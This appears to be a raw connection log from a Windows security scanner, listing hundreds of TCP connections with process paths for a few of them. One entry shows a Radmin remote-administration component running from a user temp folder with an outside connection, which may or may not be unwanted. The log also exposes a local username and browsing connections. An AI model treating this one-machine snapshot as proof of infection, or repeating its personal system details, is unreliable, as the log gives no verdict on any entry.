52647TIME_WAIT35.227.233.104443  [0]
x64   
52649TIME_WAIT108.157.150.22443  [0]
x64   
52650TIME_WAIT142.250.190.98443  [0]
x64   
52651TIME_WAIT108.157.148.226443  [0]
x64   
52653TIME_WAIT142.250.191.234443  [0]
x64   
52654TIME_WAIT142.250.190.2443  [0]
x64   
52655TIME_WAIT142.250.190.68443  [0]
x64   
52656TIME_WAIT108.157.142.68443  [0]
x64   
52657TIME_WAIT157.240.254.7443  [0]
x64   
52661TIME_WAIT204.79.197.200443  [0]
x64   
52662TIME_WAIT108.157.147.100443  [0]
x64   
52663TIME_WAIT108.157.148.226443  [0]
x64   
52665TIME_WAIT3.162.155.32443  [0]
x64   
52666TIME_WAIT3.162.155.32443  [0]
x64   
52667TIME_WAIT172.67.70.134443  [0]
x64   
52668TIME_WAIT142.251.32.16443  [0]
x64   
52669TIME_WAIT130.211.23.194443  [0]
x64   
52670TIME_WAIT172.217.2.34443  [0]
x64   
52675TIME_WAIT104.22.52.86443  [0]
x64   
52676TIME_WAIT52.46.128.147443  [0]
x64   
52677TIME_WAIT172.67.209.82443  [0]
x64   
52678TIME_WAIT172.64.107.32443  [0]
x64   
52679TIME_WAIT104.26.3.70443  [0]
x64   
52681TIME_WAIT142.250.190.38443  [0]
x64   
52682TIME_WAIT172.217.1.110443  [0]
x64   
52683TIME_WAIT157.240.254.35443  [0]
x64   
52684TIME_WAIT199.127.204.171443  [0]
x64   
52685TIME_WAIT216.239.36.181443  [0]
x64   
52686TIME_WAIT34.98.64.218443  [0]
x64   
52687TIME_WAIT35.71.139.29443  [0]
x64   
52688TIME_WAIT142.250.123.155443  [0]
x64   
52691TIME_WAIT52.1.59.237443  [0]
x64   
52692TIME_WAIT142.250.191.142443  [0]
x64   
52695TIME_WAIT52.46.128.147443  [0]
x64   
52696TIME_WAIT3.229.139.82443  [0]
x64   
52697TIME_WAIT68.67.181.211443  [0]
x64   
52698TIME_WAIT35.211.178.172443  [0]
x64   
52701TIME_WAIT52.223.40.198443  [0]
x64   
52702TIME_WAIT124.146.215.44443  [0]
x64   
52703TIME_WAIT142.250.190.98443  [0]
x64   
52704TIME_WAIT80.77.87.166443  [0]
x64   
52706TIME_WAIT104.36.115.111443  [0]
x64   
52707TIME_WAIT68.67.160.24443  [0]
x64   
52710TIME_WAIT35.165.116.20443  [0]
x64   
52711TIME_WAIT34.107.148.139443  [0]
x64   
52712TIME_WAIT104.18.24.185443  [0]
x64   
52714TIME_WAIT208.115.232.150443  [0]
x64   
52716TIME_WAIT69.173.151.100443  [0]
x64   
52717TIME_WAIT104.36.115.113443  [0]
x64   
52718TIME_WAIT34.102.146.192443  [0]
x64   
52719TIME_WAIT34.96.70.87443  [0]
x64   
52721TIME_WAIT172.217.0.161443  [0]
x64   
52723TIME_WAIT157.240.254.35443  [0]
x64   
52724TIME_WAIT108.157.134.49443  [0]
x64   
52727TIME_WAIT35.190.90.30443  [0]
x64   
52728TIME_WAIT108.157.142.101443  [0]
x64   
52729TIME_WAIT104.18.35.34443  [0]
x64   
52730TIME_WAIT34.111.113.62443  [0]
x64   
52731TIME_WAIT199.127.204.142443  [0]
x64   
52733TIME_WAIT35.190.39.111443  [0]
x64   
52734TIME_WAIT69.173.151.100443  [0]
x64   
52735TIME_WAIT3.234.5.114443  [0]
x64   
52738TIME_WAIT35.169.133.213443  [0]
x64   
52741ESTABLISHED49.12.117.5180c:\users\isaac\appdata\local\temp\fd369298e4\jweupdater.exe [19352]
833132.36 kb, rsah, created: 05.03.2023 23:23:54, modified: 05.03.2023 23:21:53
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Radmin componentCopyright © 1999-2017 Famatech Corp. and its licensors. All rights reserved.
52742TIME_WAIT50.31.142.159443  [0]
x64   
52744TIME_WAIT192.184.69.215443  [0]
x64   
52747TIME_WAIT8.28.7.83443  [0]
x64   
52749TIME_WAIT162.248.18.32443  [0]
x64   
52751TIME_WAIT34.171.234.26443  [0]
x64   
52752TIME_WAIT162.248.18.37443  [0]
x64   
52753TIME_WAIT104.18.25.173443  [0]
x64   
52756TIME_WAIT104.18.170.114443  [0]
x64   
52758TIME_WAIT142.250.190.98443  [0]
x64   
52759TIME_WAIT52.94.220.185443  [0]
x64   
52760TIME_WAIT69.173.151.100443  [0]
x64   
52761TIME_WAIT88.99.52.179443  [0]
x64   
52762TIME_WAIT3.225.218.10443  [0]
x64   
52764TIME_WAIT13.107.42.14443  [0]
x64   
52765TIME_WAIT104.18.170.114443  [0]
x64   
52767TIME_WAIT38.98.139.150443  [0]
x64   
52768TIME_WAIT162.248.18.34443  [0]
x64   
52771TIME_WAIT141.226.124.48443  [0]
x64   
52772TIME_WAIT64.74.236.191443  [0]
x64   
52773TIME_WAIT52.44.28.1443  [0]
x64   
52775TIME_WAIT104.18.34.10443  [0]
x64   
52776TIME_WAIT69.173.151.100443  [0]
x64   
52777TIME_WAIT198.148.27.131443  [0]
x64   
52782TIME_WAIT141.148.8.2443  [0]
x64   
52783TIME_WAIT88.99.52.179443  [0]
x64   
52784TIME_WAIT141.148.8.2443  [0]
x64   
52787TIME_WAIT142.250.191.225443  [0]
x64   
52789TIME_WAIT104.18.11.47443  [0]
x64   
52790TIME_WAIT108.157.148.226443  [0]
x64   
52791TIME_WAIT142.250.191.225443  [0]
x64   
52792TIME_WAIT108.157.150.60443  [0]
x64   
52793TIME_WAIT142.250.191.138443  [0]
x64   
52798TIME_WAIT142.250.190.2443  [0]
x64   
52799TIME_WAIT104.36.115.111443  [0]
x64   
52800TIME_WAIT34.107.148.139443  [0]
x64   
52801TIME_WAIT35.211.165.203443  [0]
x64   
52802TIME_WAIT52.4.33.45443  [0]
x64   
52804TIME_WAIT142.250.191.162443  [0]
x64   
52805TIME_WAIT172.217.4.195443  [0]
x64   
52808TIME_WAIT108.157.142.5443  [0]
x64   
52810TIME_WAIT108.157.142.57443  [0]
x64   
52811TIME_WAIT23.23.181.143443  [0]
x64   
52812TIME_WAIT52.3.164.5443  [0]
x64   
52813TIME_WAIT108.157.148.226443  [0]
x64   
52814TIME_WAIT142.250.190.132443  [0]
x64   
52815TIME_WAIT108.157.150.3443  [0]
x64   
52816TIME_WAIT3.162.155.32443  [0]
x64   
52817TIME_WAIT3.162.155.32443  [0]
x64   
52818TIME_WAIT52.223.40.198443  [0]
x64   
52819TIME_WAIT54.224.96.217443  [0]
x64   
52820TIME_WAIT35.153.244.124443  [0]
x64   
52821TIME_WAIT69.173.151.98443  [0]
x64   
52824TIME_WAIT69.173.151.98443  [0]
x64   
52825TIME_WAIT172.67.133.7443  [0]
x64   
52826TIME_WAIT172.67.133.7443  [0]
x64   
52827TIME_WAIT3.211.253.240443  [0]
x64   
52828TIME_WAIT142.250.190.98443  [0]
x64   
52830TIME_WAIT185.167.164.43443  [0]
x64   
52831TIME_WAIT35.186.253.211443  [0]
x64   
52832TIME_WAIT52.46.143.56443  [0]
x64   
52833TIME_WAIT142.250.191.225443  [0]
x64   
52834TIME_WAIT108.157.142.43443  [0]
x64   
52835TIME_WAIT8.28.7.84443  [0]
x64   
52836TIME_WAIT35.190.80.1443  [0]
x64   
52838TIME_WAIT50.112.185.193443  [0]
x64   
52839TIME_WAIT108.157.142.43443  [0]
x64   
52840TIME_WAIT34.133.71.175443  [0]
x64   
52842TIME_WAIT108.157.150.26443  [0]
x64   
52844TIME_WAIT3.225.218.10443  [0]
x64   
52845TIME_WAIT54.174.190.28443  [0]
x64   
52846TIME_WAIT68.67.160.24443  [0]
x64   
52847TIME_WAIT198.148.27.131443  [0]
x64   
52848TIME_WAIT34.192.43.152443  [0]
x64   
52849TIME_WAIT44.207.191.198443  [0]
x64   
52851TIME_WAIT205.180.87.140443  [0]
x64   
52853TIME_WAIT52.46.143.56443  [0]
x64   
52856TIME_WAIT162.248.18.32443  [0]
x64   
52857TIME_WAIT52.46.143.56443  [0]
x64   
52858TIME_WAIT80.77.87.166443  [0]
x64   
52859TIME_WAIT35.71.139.29443  [0]
x64   
52863TIME_WAIT34.236.12.197443  [0]
x64   
52864TIME_WAIT64.202.112.95443  [0]
x64   
52865TIME_WAIT52.46.143.56443  [0]
x64   
52866TIME_WAIT52.46.143.56443  [0]
x64   
52867TIME_WAIT54.200.49.142443  [0]
x64   
52869TIME_WAIT52.46.143.56443  [0]
x64   
52876TIME_WAIT52.223.40.198443  [0]
x64   
52877TIME_WAIT34.111.113.62443  [0]
x64   
52878TIME_WAIT142.250.190.98443  [0]
x64   
52881TIME_WAIT3.226.99.159443  [0]
x64   
52882TIME_WAIT35.244.159.8443  [0]
x64   
52883TIME_WAIT199.127.204.171443  [0]
x64   
52884TIME_WAIT199.127.204.171443  [0]
x64   
52886TIME_WAIT52.223.40.198443  [0]
x64   
52890TIME_WAIT52.223.40.198443  [0]
x64   
52894TIME_WAIT18.223.55.169443  [0]
x64   
52895TIME_WAIT35.211.178.172443  [0]
x64   
52896TIME_WAIT159.127.41.105443  [0]
x64   
52897TIME_WAIT35.207.24.140443  [0]
x64   
52899TIME_WAIT104.26.2.146443  [0]
x64   
52902TIME_WAIT35.190.60.146443  [0]
x64   
52904TIME_WAIT69.173.151.100443  [0]
x64   
52908TIME_WAIT35.211.178.172443  [0]
x64   
52909TIME_WAIT35.211.178.172443  [0]
x64   
52912TIME_WAIT35.211.178.172443  [0]
x64   
52914TIME_WAIT216.200.232.253443  [0]
x64   
52915TIME_WAIT216.200.232.253443  [0]
x64   
52916TIME_WAIT69.173.151.100443  [0]
x64   
52917TIME_WAIT69.173.151.100443  [0]
x64   
52918TIME_WAIT38.98.139.150443  [0]
x64   
52920TIME_WAIT8.2.110.134443  [0]
x64   
52924TIME_WAIT35.153.173.92443  [0]
x64   
52925TIME_WAIT199.38.167.131443  [0]
x64   
52926TIME_WAIT69.173.151.100443  [0]
x64   
52927TIME_WAIT52.44.28.1443  [0]
x64   
52928TIME_WAIT205.180.86.172443  [0]
x64   
52929TIME_WAIT69.173.151.100443  [0]
x64   
52930TIME_WAIT52.46.143.56443  [0]
x64   
52931TIME_WAIT107.178.254.65443  [0]
x64   
52933TIME_WAIT159.127.41.204443  [0]
x64   
52934TIME_WAIT213.19.162.90443  [0]
x64   
52935TIME_WAIT213.19.162.90443  [0]
x64   
52936TIME_WAIT52.46.143.56443  [0]
x64   
52937TIME_WAIT108.157.142.63443  [0]
x64   
52938TIME_WAIT52.5.143.9443  [0]
x64   
52943TIME_WAIT34.237.249.31443  [0]
x64   
52944TIME_WAIT64.202.112.95443  [0]
x64   
52946TIME_WAIT69.173.151.100443  [0]
x64   
52947TIME_WAIT69.173.151.100443  [0]
x64   
52950TIME_WAIT192.132.33.46443  [0]
x64   
52952TIME_WAIT13.107.42.14443  [0]
x64   
52953TIME_WAIT18.232.29.29443  [0]
x64   
52958TIME_WAIT199.127.204.142443  [0]
x64   
52960TIME_WAIT204.62.13.72443  [0]
x64   
52961TIME_WAIT8.2.110.33443  [0]
x64   
52962TIME_WAIT50.57.31.206443  [0]
x64   
52964TIME_WAIT52.46.143.56443  [0]
x64   
52965TIME_WAIT69.173.151.100443  [0]
x64   
52966TIME_WAIT52.3.164.5443  [0]
x64   
52967TIME_WAIT185.167.164.39443  [0]
x64   
52968TIME_WAIT185.167.164.39443  [0]
x64   
52969TIME_WAIT69.173.151.100443  [0]
x64   
52970TIME_WAIT199.127.204.142443  [0]
x64   
52971TIME_WAIT104.18.28.38443  [0]
x64   
52973TIME_WAIT104.18.10.47443  [0]
x64   
52975TIME_WAIT162.55.233.29443  [0]
x64   
52978TIME_WAIT52.46.128.147443  [0]
x64   
52980TIME_WAIT50.17.102.50443  [0]
x64   
52985TIME_WAIT199.38.167.130443  [0]
x64   
52987TIME_WAIT142.250.190.33443  [0]
x64   
52989TIME_WAIT104.26.9.50443  [0]
x64   
52991TIME_WAIT199.127.204.171443  [0]
x64   
52992TIME_WAIT64.74.236.191443  [0]
x64   
52996TIME_WAIT35.207.24.140443  [0]
x64   
52998TIME_WAIT54.174.190.28443  [0]
x64   
53000TIME_WAIT204.62.13.72443  [0]
x64   
53003TIME_WAIT34.208.210.191443  [0]
x64   
53005TIME_WAIT35.211.178.172443  [0]
x64   
53007TIME_WAIT64.74.236.191443  [0]
x64   
53008TIME_WAIT69.173.151.100443  [0]
x64   
53010TIME_WAIT44.207.191.198443  [0]
x64   
53011TIME_WAIT23.23.226.41443  [0]
x64   
53012TIME_WAIT35.211.178.172443  [0]
x64   
53014TIME_WAIT199.127.204.171443  [0]
x64   
53015TIME_WAIT198.54.12.145443  [0]
x64   
53016TIME_WAIT199.127.204.142443  [0]
x64   
53017TIME_WAIT44.197.37.250443  [0]
x64   
53019TIME_WAIT74.121.140.211443  [0]
x64   
53025TIME_WAIT173.231.184.20443  [0]
x64   
53026TIME_WAIT54.147.253.182443  [0]
x64   
53027TIME_WAIT82.145.213.8443  [0]
x64   
53028TIME_WAIT34.231.29.114443  [0]
x64   
53029TIME_WAIT107.23.55.247443  [0]
x64   
53030TIME_WAIT35.190.60.146443  [0]
x64   
53034TIME_WAIT38.68.201.140443  [0]
x64   
53035TIME_WAIT64.74.236.255443  [0]
x64   
53038TIME_WAIT139.45.240.92443  [0]
x64   
53039TIME_WAIT69.173.151.100443  [0]
x64   
53040TIME_WAIT35.211.178.172443  [0]
x64   
53041TIME_WAIT142.250.191.130443  [0]
x64   
53043TIME_WAIT44.207.72.204443  [0]
x64   
53045TIME_WAIT141.226.124.48443  [0]
x64   
53046TIME_WAIT52.1.17.31443  [0]
x64   
53049TIME_WAIT35.71.139.29443  [0]
x64   
53050TIME_WAIT3.225.218.10443  [0]
x64   
53051TIME_WAIT124.146.215.44443  [0]
x64   
53053TIME_WAIT38.98.139.150443  [0]
x64   
53054TIME_WAIT34.117.157.22443  [0]
x64   
53055TIME_WAIT52.44.28.1443  [0]
x64   
53056TIME_WAIT44.214.127.118443  [0]
x64   
53057TIME_WAIT44.196.89.168443  [0]
x64   
53060TIME_WAIT52.223.40.198443  [0]
x64   
53061TIME_WAIT50.112.185.193443  [0]
x64   
53062TIME_WAIT50.31.142.159443  [0]
x64   
53063TIME_WAIT104.36.113.107443  [0]
x64   
53065TIME_WAIT107.178.254.65443  [0]
x64   
53066TIME_WAIT18.208.66.145443  [0]
x64   
53068TIME_WAIT108.157.142.94443  [0]
x64   
53070TIME_WAIT38.98.139.150443  [0]
x64   
53071TIME_WAIT35.190.60.146443  [0]
x64   
53075TIME_WAIT69.173.151.100443  [0]
x64   
53076TIME_WAIT38.98.139.150443  [0]
x64   
53077TIME_WAIT3.214.207.4443  [0]
x64   
53078TIME_WAIT108.157.142.90443  [0]
x64   
53079TIME_WAIT38.98.139.150443  [0]
x64   
53081TIME_WAIT192.184.69.252443  [0]
x64   
53082TIME_WAIT38.98.139.150443  [0]
x64   
53083TIME_WAIT52.116.53.150443  [0]
x64   
53084TIME_WAIT64.74.236.191443  [0]
x64   
53085TIME_WAIT34.117.26.124443  [0]
x64   
53087TIME_WAIT3.135.132.32443  [0]
x64   
53088TIME_WAIT173.231.178.83443  [0]
x64   
53089TIME_WAIT38.98.139.150443  [0]
x64   
53090TIME_WAIT199.38.167.130443  [0]
x64   
53092TIME_WAIT38.98.139.150443  [0]
x64   
53093TIME_WAIT35.227.233.104443  [0]
x64   
53097TIME_WAIT199.127.204.171443  [0]
x64   
53098TIME_WAIT34.102.163.6443  [0]
x64   
53099TIME_WAIT34.171.234.26443  [0]
x64   
53102TIME_WAIT35.186.193.173443  [0]
x64   
53104TIME_WAIT172.104.70.67443  [0]
x64   
53105TIME_WAIT34.102.253.54443  [0]
x64   
53109TIME_WAIT35.175.166.208443  [0]
x64   
53112TIME_WAIT104.36.115.113443  [0]
x64   
53113TIME_WAIT162.248.18.37443  [0]
x64   
53115TIME_WAIT69.173.151.100443  [0]
x64   
53116TIME_WAIT8.28.7.83443  [0]
x64   
53117TIME_WAIT172.104.70.67443  [0]
x64   
53118TIME_WAIT3.137.121.12443  [0]
x64   
53120TIME_WAIT35.169.133.213443  [0]
x64   
53122TIME_WAIT8.28.7.84443  [0]
x64   
53125TIME_WAIT35.227.233.104443  [0]
x64   
53129TIME_WAIT204.79.197.200443  [0]
x64   
53132TIME_WAIT108.157.148.226443  [0]
x64   
53133TIME_WAIT108.157.150.22443  [0]
x64   
53134TIME_WAIT108.157.142.68443  [0]
x64   
53136TIME_WAIT172.67.70.134443  [0]
x64   
53137TIME_WAIT108.157.142.16443  [0]
x64   
53138TIME_WAIT3.162.155.32443  [0]
x64   
53139TIME_WAIT3.162.155.32443  [0]
x64   
53140TIME_WAIT108.157.148.226443  [0]
x64   
53144TIME_WAIT104.26.3.70443  [0]
x64   
53145TIME_WAIT108.157.142.63443  [0]
x64   
53146TIME_WAIT108.157.150.75443  [0]
x64   
53149TIME_WAIT52.57.87.82443  [0]
x64   
53153TIME_WAIT108.157.150.111443  [0]
x64   
53156TIME_WAIT108.157.150.75443  [0]
x64   
53157TIME_WAIT141.148.8.2443  [0]
x64   
53159TIME_WAIT172.217.0.161443  [0]
x64   
53160TIME_WAIT108.157.142.101443  [0]
x64   
53161TIME_WAIT108.157.142.16443  [0]
x64   
53162TIME_WAIT108.157.142.29443  [0]
x64   
53163TIME_WAIT3.234.5.114443  [0]
x64   
53164TIME_WAIT108.157.150.90443  [0]
x64   
53165TIME_WAIT35.190.60.146443  [0]
x64   
53166TIME_WAIT108.157.150.17443  [0]
x64   
53168TIME_WAIT52.223.40.198443  [0]
x64   
53169TIME_WAIT52.223.40.198443  [0]
x64   
53170TIME_WAIT3.225.218.10443  [0]
x64   
53171TIME_WAIT172.217.4.74443  [0]
x64   
53174TIME_WAIT37.157.3.20443  [0]
x64   
53176TIME_WAIT108.157.150.15443  [0]
x64   
53178TIME_WAIT52.116.53.150443  [0]
x64   
53181TIME_WAIT172.217.0.170443  [0]
x64   
53184TIME_WAIT172.217.2.38443  [0]
x64   
53192TIME_WAIT172.217.4.34443  [0]
x64   
53203TIME_WAIT142.250.190.2443  [0]
x64   
53205TIME_WAIT3.229.139.82443  [0]
x64   
53207TIME_WAIT34.96.105.8443  [0]
x64   
53210TIME_WAIT142.250.191.162443  [0]
x64   
53211TIME_WAIT142.250.112.120443  [0]
x64   
53213TIME_WAIT142.251.172.155443  [0]
x64   
53218TIME_WAIT104.18.28.58443  [0]
x64   
53219TIME_WAIT35.170.92.37443  [0]
x64   
53220TIME_WAIT23.23.183.246443  [0]
x64   
53223TIME_WAIT172.217.2.33443  [0]
x64   
53224TIME_WAIT74.125.9.70443  [0]
x64   
53225TIME_WAIT172.217.2.46443  [0]
x64   
53230TIME_WAIT199.127.204.171443  [0]
x64   
53231TIME_WAIT199.38.167.131443  [0]
x64   
53233TIME_WAIT142.250.190.38443  [0]
x64   
53242TIME_WAIT18.160.249.3443  [0]
x64   
53243TIME_WAIT104.36.115.111443  [0]
x64   
53244TIME_WAIT34.107.148.139443  [0]
x64   
53245TIME_WAIT208.115.232.150443  [0]
x64   
53246TIME_WAIT35.165.116.20443  [0]
x64   
53248TIME_WAIT54.166.65.208443  [0]
x64   
53250TIME_WAIT34.111.113.62443  [0]
x64   
53252TIME_WAIT142.250.190.78443  [0]
x64   
53257TIME_WAIT3.219.61.138443  [0]
x64   
53258TIME_WAIT142.250.190.142443  [0]
x64   
53259TIME_WAIT107.178.254.65443  [0]
x64   
53264TIME_WAIT108.157.150.103443  [0]
x64   
53266TIME_WAIT35.190.43.134443  [0]
x64   
53267TIME_WAIT35.227.192.142443  [0]
x64   
53269TIME_WAIT199.38.167.130443  [0]
x64   
53270TIME_WAIT108.157.142.90443  [0]
x64   
53272TIME_WAIT205.180.86.204443  [0]
x64   
53281TIME_WAIT192.132.33.46443  [0]
x64   
53282TIME_WAIT172.217.0.162443  [0]
x64   
53283TIME_WAIT185.167.164.43443  [0]
x64   
53286TIME_WAIT50.57.31.206443  [0]
x64   
53287TIME_WAIT3.225.218.10443  [0]
x64   
53290TIME_WAIT3.225.218.10443  [0]
x64   
53292TIME_WAIT104.22.68.131443  [0]
x64   
53293TIME_WAIT35.211.178.172443  [0]
x64   
53294TIME_WAIT213.19.162.80443  [0]
x64   
53295TIME_WAIT159.127.41.108443  [0]
x64   
53300TIME_WAIT44.214.127.118443  [0]
x64   
53302TIME_WAIT104.36.115.113443  [0]
x64   
53304TIME_WAIT185.167.164.37443  [0]
x64   
53306TIME_WAIT52.1.59.237443  [0]
x64   
53309TIME_WAIT74.121.140.211443  [0]
x64   
53310TIME_WAIT52.138.124.216443  [0]
x64   
53311TIME_WAIT13.89.179.10443  [0]
x64   
53315TIME_WAIT35.211.178.172443  [0]
x64   
53316TIME_WAIT52.1.17.31443  [0]
x64   
53318TIME_WAIT69.173.151.100443  [0]
x64   
53321TIME_WAIT35.71.139.29443  [0]
x64   
53323TIME_WAIT44.207.72.204443  [0]
x64   
53324TIME_WAIT141.226.124.48443  [0]
x64   
53325TIME_WAIT52.44.28.1443  [0]
x64   
53326TIME_WAIT44.196.89.168443  [0]
x64   
53327TIME_WAIT34.102.166.132443  [0]
x64   
53328TIME_WAIT52.2.160.177443  [0]
x64   
53331TIME_WAIT34.192.43.152443  [0]
x64   
53334TIME_WAIT38.98.139.150443  [0]
x64   
53336TIME_WAIT34.170.123.2443  [0]
x64   
53338TIME_WAIT52.46.143.56443  [0]
x64   
53340TIME_WAIT104.19.136.78443  [0]
x64   
53341TIME_WAIT108.156.91.120443  [0]
x64   
53342TIME_WAIT185.167.164.49443  [0]
x64   
53344TIME_WAIT216.239.32.21443  [0]
x64   
53352TIME_WAIT159.127.41.105443  [0]
x64   
53353ESTABLISHED31.13.93.49443d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136]
8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
53354ESTABLISHED31.13.93.49443d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136]
8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
53355TIME_WAIT54.147.94.189443  [0]
x64   
53356TIME_WAIT104.18.25.173443  [0]
x64   
53357TIME_WAIT35.244.210.213443  [0]
x64   
53358TIME_WAIT50.57.31.206443  [0]
x64   
53362TIME_WAIT172.217.4.34443  [0]
x64   
53370TIME_WAIT159.127.41.204443  [0]
x64   
53374TIME_WAIT18.232.29.29443  [0]
x64   
53376TIME_WAIT104.22.17.141443  [0]
x64   
53377TIME_WAIT54.167.64.228443  [0]
x64   
53379TIME_WAIT108.157.142.90443  [0]
x64   
53380TIME_WAIT108.157.142.49443  [0]
x64   
53381TIME_WAIT35.244.159.8443  [0]
x64   
53383ESTABLISHED23.220.102.24443c:\program files (x86)\steam\bin\cef\cef.win7x64\steamwebhelper.exe [5312]
6992.35 kb, rsAh, created: 29.04.2020 11:57:29, modified: 21.07.2023 14:04:22
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Steam Client WebHelperCopyright (C) 2014 Valve Corporation
53394TIME_WAIT34.117.228.201443  [0]
x64   
53395TIME_WAIT142.250.190.98443  [0]
x64   
53396TIME_WAIT34.111.234.236443  [0]
x64   
53397TIME_WAIT35.195.81.176443  [0]
x64   
53399TIME_WAIT18.233.161.105443  [0]
x64   
53400TIME_WAIT68.67.179.166443  [0]
x64   
53410SYN_SENT13.248.148.254443c:\program files (x86)\bookingdesktopapp\update\bookingdesktopappupdate.exe [25520]
100.00 kb, rsAh, created: 29.09.2020 19:53:40, modified: 29.09.2020 19:53:39
Script: Quarantine, Delete, Delete via BC, Terminate
x64 bookingDesktopApp UpdateCopyright 2007-2010 Google Inc.
53412TIME_WAIT185.89.210.59443  [0]
x64   
53418TIME_WAIT68.67.160.24443  [0]
x64   
53419TIME_WAIT104.36.115.111443  [0]
x64   
53420TIME_WAIT52.4.33.45443  [0]
x64   
53421TIME_WAIT35.211.165.203443  [0]
x64   
53423TIME_WAIT69.173.151.98443  [0]
x64   
53424TIME_WAIT34.107.148.139443  [0]
x64   
53426TIME_WAIT141.148.8.2443  [0]
x64   
53427TIME_WAIT3.162.155.32443  [0]
x64   
53428TIME_WAIT141.148.8.2443  [0]
x64   
53429TIME_WAIT23.23.181.143443  [0]
x64   
53430TIME_WAIT52.3.164.5443  [0]
x64   
53431TIME_WAIT108.157.150.3443  [0]
x64   
53432TIME_WAIT104.36.115.111443  [0]
x64   
53434TIME_WAIT18.207.40.31443  [0]
x64   
53435TIME_WAIT108.157.142.5443  [0]
x64   
53437TIME_WAIT35.186.241.3443  [0]
x64   
53441TIME_WAIT108.157.150.34443  [0]
x64   
53442TIME_WAIT172.217.4.200443  [0]
x64   
53443TIME_WAIT108.157.150.25443  [0]
x64   
53444TIME_WAIT142.250.191.162443  [0]
x64   
53447TIME_WAIT104.22.55.232443  [0]
x64   
53448TIME_WAIT108.157.150.32443  [0]
x64   
53449TIME_WAIT142.250.190.98443  [0]
x64   
53451TIME_WAIT108.157.142.68443  [0]
x64   
53453TIME_WAIT142.250.191.162443  [0]
x64   
53454TIME_WAIT52.84.106.61443  [0]
x64   
53455TIME_WAIT142.250.190.2443  [0]
x64   
53456TIME_WAIT142.250.190.98443  [0]
x64   
53457TIME_WAIT108.157.148.226443  [0]
x64   
53459TIME_WAIT108.157.148.226443  [0]
x64   
53460TIME_WAIT104.26.7.139443  [0]
x64   
53462TIME_WAIT108.157.147.100443  [0]
x64   
53465TIME_WAIT142.250.191.206443  [0]
x64   
53466TIME_WAIT130.211.23.194443  [0]
x64   
53467TIME_WAIT172.217.1.110443  [0]
x64   
53468TIME_WAIT142.251.32.16443  [0]
x64   
53469TIME_WAIT142.250.190.38443  [0]
x64   
53470TIME_WAIT104.22.52.86443  [0]
x64   
53471TIME_WAIT104.26.3.70443  [0]
x64   
53473TIME_WAIT99.84.171.224443  [0]
x64   
53474TIME_WAIT99.84.171.224443  [0]
x64   
53476TIME_WAIT108.156.120.44443  [0]
x64   
53477TIME_WAIT35.190.80.1443  [0]
x64   
53478TIME_WAIT142.250.190.98443  [0]
x64   
53479TIME_WAIT172.217.0.161443  [0]
x64   
53480TIME_WAIT142.250.123.156443  [0]
x64   
53483TIME_WAIT142.250.191.225443  [0]
x64   
53484TIME_WAIT142.250.191.162443  [0]
x64   
53486TIME_WAIT34.195.78.113443  [0]
x64   
53487TIME_WAIT172.217.2.34443  [0]
x64   
53489TIME_WAIT142.250.190.132443  [0]
x64   
53493TIME_WAIT64.74.236.223443  [0]
x64   
53495TIME_WAIT142.250.190.98443  [0]
x64   
53497TIME_WAIT3.231.49.235443  [0]
x64   
53498TIME_WAIT104.18.24.185443  [0]
x64   
53499TIME_WAIT104.18.24.185443  [0]
x64   
53500TIME_WAIT68.67.160.186443  [0]
x64   
53501TIME_WAIT104.36.115.111443  [0]
x64   
53503TIME_WAIT54.84.99.145443  [0]
x64   
53504TIME_WAIT34.237.206.66443  [0]
x64   
53505TIME_WAIT172.217.2.38443  [0]
x64   
53506TIME_WAIT142.250.190.38443  [0]
x64   
53507TIME_WAIT50.31.142.223443  [0]
x64   
53511TIME_WAIT50.31.142.223443  [0]
x64   
53512TIME_WAIT34.96.70.87443  [0]
x64   
53515TIME_WAIT108.157.142.99443  [0]
x64   
53516TIME_WAIT54.162.38.247443  [0]
x64   
53517TIME_WAIT108.157.134.49443  [0]
x64   
53518SYN_SENT69.173.151.98443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53521TIME_WAIT35.190.60.146443  [0]
x64   
53522TIME_WAIT52.223.40.198443  [0]
x64   
53523TIME_WAIT35.211.178.172443  [0]
x64   
53524TIME_WAIT35.207.24.140443  [0]
x64   
53525TIME_WAIT34.236.174.186443  [0]
x64   
53526TIME_WAIT70.42.32.127443  [0]
x64   
53528TIME_WAIT68.67.160.24443  [0]
x64   
53529TIME_WAIT108.157.142.48443  [0]
x64   
53531TIME_WAIT107.23.55.247443  [0]
x64   
53534TIME_WAIT35.190.39.111443  [0]
x64   
53535TIME_WAIT172.217.0.161443  [0]
x64   
53538TIME_WAIT50.31.142.95443  [0]
x64   
53539TIME_WAIT50.31.142.95443  [0]
x64   
53540TIME_WAIT50.31.142.95443  [0]
x64   
53541TIME_WAIT142.250.191.130443  [0]
x64   
53542TIME_WAIT50.31.142.95443  [0]
x64   
53543TIME_WAIT185.167.164.49443  [0]
x64   
53544TIME_WAIT85.114.159.118443  [0]
x64   
53547TIME_WAIT35.175.166.208443  [0]
x64   
53548TIME_WAIT52.0.156.250443  [0]
x64   
53550TIME_WAIT69.173.151.100443  [0]
x64   
53552TIME_WAIT162.248.18.32443  [0]
x64   
53553TIME_WAIT34.98.64.218443  [0]
x64   
53554TIME_WAIT54.147.94.189443  [0]
x64   
53555TIME_WAIT3.225.218.10443  [0]
x64   
53557TIME_WAIT104.36.113.111443  [0]
x64   
53558TIME_WAIT204.79.197.200443  [0]
x64   
53560TIME_WAIT108.157.142.94443  [0]
x64   
53561TIME_WAIT207.198.113.86443  [0]
x64   
53562TIME_WAIT198.148.27.131443  [0]
x64   
53564TIME_WAIT172.67.191.172443  [0]
x64   
53565TIME_WAIT192.184.69.167443  [0]
x64   
